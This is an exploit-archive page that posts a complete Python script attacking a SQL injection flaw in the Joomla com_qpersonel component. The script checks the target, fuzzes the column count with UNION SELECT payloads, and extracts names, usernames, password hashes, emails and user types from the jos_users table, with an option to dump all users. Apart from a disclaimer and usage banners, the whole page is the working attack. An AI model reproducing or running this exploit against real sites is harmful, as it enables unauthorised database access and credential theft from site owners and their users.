Joomla com_qpersonel SQL Injection Exploit
Posted on 24 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla com_qpersonel SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================== Joomla com_qpersonel SQL Injection Exploit ========================================== #!/usr/bin/python # Joomla com_qpersonel SQL Injection Remote Exploit # Version 1.0 (23th May 2010 (public release) # By Valentin Hoebel (valentin@xenuser.org) # ASCII FOR BREAKFAST # # EXPLOIT BASED ON MY COLUMN FUZZER # Fuzzer was enhanced so it serves as a Joomla Exploiter template # # ------------------------------------------------------------------------ # Exploits the SQL injection vulnerability I discovered # on 13th April 2010. # # Copy, modify, distribute and share the code as you like! # Warning: I am not responsible for any damage you might cause! # Exploit written for educational purposes only. import sys, re, urllib, urllib2, string from urllib2 import Request, urlopen, URLError, HTTPError # Define the max. amounts for trying max_columns = 100 # Prints usage def print_usage(): print "" print "=================================================================================" print " Joomla com_qpersonel SQL Injection Remote Exploit" print " by Valentin Hoebel (valentin@xenuser.org)" print "" print " Vulnerable URL example:" print " http://target/index.php?option=com_qpersonel&task=qpListele&katid=1" print "" print " Usage:" print " -u <URL> (e.g. -u "http://target/index.php?option=com_qpersonel&task=qpListele&katid=1")" print " --help (displays this text)" print "" print " Read the source code if you want to know more about this vulnerability." print " For educational purposes only! I am not responsible if you cause any damage!" print "" print "=================================================================================" print "" print "" return #Prints banner def print_banner(): print "" print "=================================================================================" print "" print " Joomla com_qpersonel SQL Injection Remote Exploit" print " by Valentin Hoebel (valentin@xenuser.org)" print "" print " For educational purposes only! I am not responsible if you cause any damage!" print "" print "=================================================================================" print "" return # Testing if URL is reachable, with error handling def test_url(): print ">> Checking if connection can be established..." try: response = urllib2.urlopen(provided_url) except HTTPError, e: print ">> The connection could not be established." print ">> Error code: ", e.code print ">> Exiting now!" print "" sys.exit(1) except URLError, e: print ">> The connection could not be established." print ">> Reason: ", e.reason print ">> Exiting now!" print "" sys.exit(1) else: valid_target = 1 print ">> Connected to target! URL seems to be valid." print "" return # Find correct amount of columns for the SQL Injection and enhance with Joomla exploitation capabilities def find_columns(): # Define some important variables and make the script a little bit dynamic number_of_columns = 1 column_finder_url_string = "+AND+1=2+UNION+SELECT+" column_finder_url_message = "0x503077337220743020743368206330777321" column_finder_url_message_plain = "P0w3r t0 t3h c0ws!" column_finder_url_terminator = "+from+jos_users--" next_column = "," column_finder_url_sample = "group_concat(0x503077337220743020743368206330777321,name,username,password,email,usertype,0x503077337220743020743368206330777321)" # Craft the final URL to check final_check_url = provided_url+column_finder_url_string+column_finder_url_message print ">> Trying to find the correct number of columns..." for x in xrange(1, max_columns): # Visit website and store response source code of site final_check_url2 = final_check_url+column_finder_url_terminator response = urllib2.urlopen(final_check_url2) html = response.read() find_our_injected_string = re.findall(column_finder_url_message_plain, html) # When the correct amount was found we display the information and exit if len(find_our_injected_string) != 0: print ">> Correct number of columns found!" print ">> Amount: ", number_of_columns # Craft our exploit query malicious_query = string.replace(final_check_url2, column_finder_url_message, column_finder_url_sample) print "" print ">> Trying to fetch the first user of the Joomla user table..." # Receive the first user of the Joomla user table response = urllib2.urlopen(malicious_query) html = response.read() get_secret_data = string.find(html, "P0w3r t0 t3h c0ws!") get_secret_data += 18 new_html = html[get_secret_data :] new_get_secret_data = string.find(new_html, "P0w3r t0 t3h c0ws!") new_html_2 = new_html[:new_get_secret_data] print "name, username, password, e-mail address and user status are shown" print new_html_2 print "" # Offer to display all entries of the Joomla user table user_reply = str(raw_input(">> Do you want to display all Joomla users? Replying with Yes will show you the source code response of the website. (Yes/No) ")) if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes": print "" print "-------------------------------------------------------------" print new_html print "-------------------------------------------------------------" print "The seperator for the single entries is: ", column_finder_url_message_plain print "Bye!" print "" print "" sys.exit(1) else: print "Bye!" print "" print "" sys.exit(1) # Increment counter var by one number_of_columns += 1 #Add a new column to the URL final_check_url += next_column final_check_url += column_finder_url_message # If fuzzing is not successfull print this message print ">> Fuzzing was not successfull. Maybe the target is not vulnerable?" print "Bye!" print "" print "" # Checking if argument was provided if len(sys.argv) <=1: print_usage() sys.exit(1) for arg in sys.argv: # Checking if help was called if arg == "--help": print_usage() sys.exit(1) # Checking if URL was provided, if yes -> go! if arg == "-u": provided_url = sys.argv[2] print_banner() # At first we test if we can actually reach the provided URL test_url() # Now start with finding the correct amount of columns find_columns() ### EOF ### # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-24]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
